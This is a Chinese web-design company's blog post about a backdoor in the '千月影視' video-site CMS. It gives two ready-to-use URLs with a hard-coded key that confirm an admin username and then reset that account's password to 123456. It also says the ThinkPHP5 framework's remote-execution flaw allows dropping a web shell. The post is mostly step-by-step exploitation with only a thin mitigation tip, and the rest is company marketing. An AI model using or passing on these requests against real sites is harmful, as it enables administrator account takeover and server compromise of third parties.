-
首頁
-
網站建設
-
優化推廣
-
案例
方案
方案
Solutions
電商平臺
電商網站開發
E-commerce & System
微信營銷
資訊
我們
我們
About Us
聯系
聯系
Contact Us
-
- 聯系方式
- 業務熱線: 15082661954
- 郵箱: foxl@www.kxlw.net
- 人才招聘
- HR郵箱:
- 190014322@qq.com
精準傳達 ? 價值共享
洞悉互聯網前沿資訊,探尋網站營銷規律
千月影視HouMen
作者:狐靈安全組 | 2019-06-14 10:47 |點擊:
給你們解釋一下 第一段代碼是判斷 用戶名是否存在 第二段是修改 不光可以修改 管理員密碼 還可以修改代[過濾]理 知道用戶名就可以
因為時間問題 這里我說一下 千月用的是tp5 框架還有 遠程執行漏洞 直接放大馬
這個應該是作者原本留的防止忘記密碼 但是被黑客利用了
- 域名+/login/login/yzcode?username=admin&key=465454&password=123456
- 域名+/login/login/repass?username=admin&key=465454&password=123456
使用方法:我們先運行第一段代碼,如果顯示成功,就是可以改密碼,然后我們在運行第二段代碼就可以了。
然后賬號密碼就變成admin 123456
預防方法:我們把管理員用戶名更改一下,不要讓別人知道就改不了,我演示是給大家看
關于狐靈科技
+狐靈致力于互聯網品牌建設與網絡營銷,專業領域包括 網站建設、 SEO優化、移動互聯網營銷、高端網站建設、高端網站設計、品牌網站定制開發、營銷策劃推廣電子商務、移動互聯網營銷、 為不同類型的客戶提供良好的互聯網應用定制解決方案,我們將策略和執行緊密結合,且不斷評估并優化我們的方案,為客戶提供一體化全方位的互聯網品牌整合方案!
我們的優勢
多項網站設計傳播大獎
營銷型網站建設專家
自主研發網站管理系統
B2C電商網站建設供應商
完善的售后服務體系
我們的不同
+在我們的對手消耗大量的時間停留在碎片化的互聯網設計或者程序實現的時候,我們已經開始把數字化品牌建設和網絡傳播進行了整合。我們提供從前期的網站品牌分析策劃、網站設計、創意表現、系統開發以及后續網站運營反饋建議等一系列服務,幫助企業打造創新的互聯網品牌經營模式與有效的網絡營銷方法,為所有謀求長遠發展的企業品牌貢獻全力!
公司地址:重慶市九龍坡楊家坪重百大樓21-8 | 業務熱線:15082661954
Copyright © 2017-2020 Fox spirit Network. 狐靈科技 版權所有 | 渝ICP備19005721號-1
專業團隊為您提供 重慶網頁設計, 品牌網站設計,營銷型網站制作,SEO優化關鍵詞排名推廣等服務,建網站就找狐靈科技! | TAG標簽 | 網站建設地圖 | 網站地圖
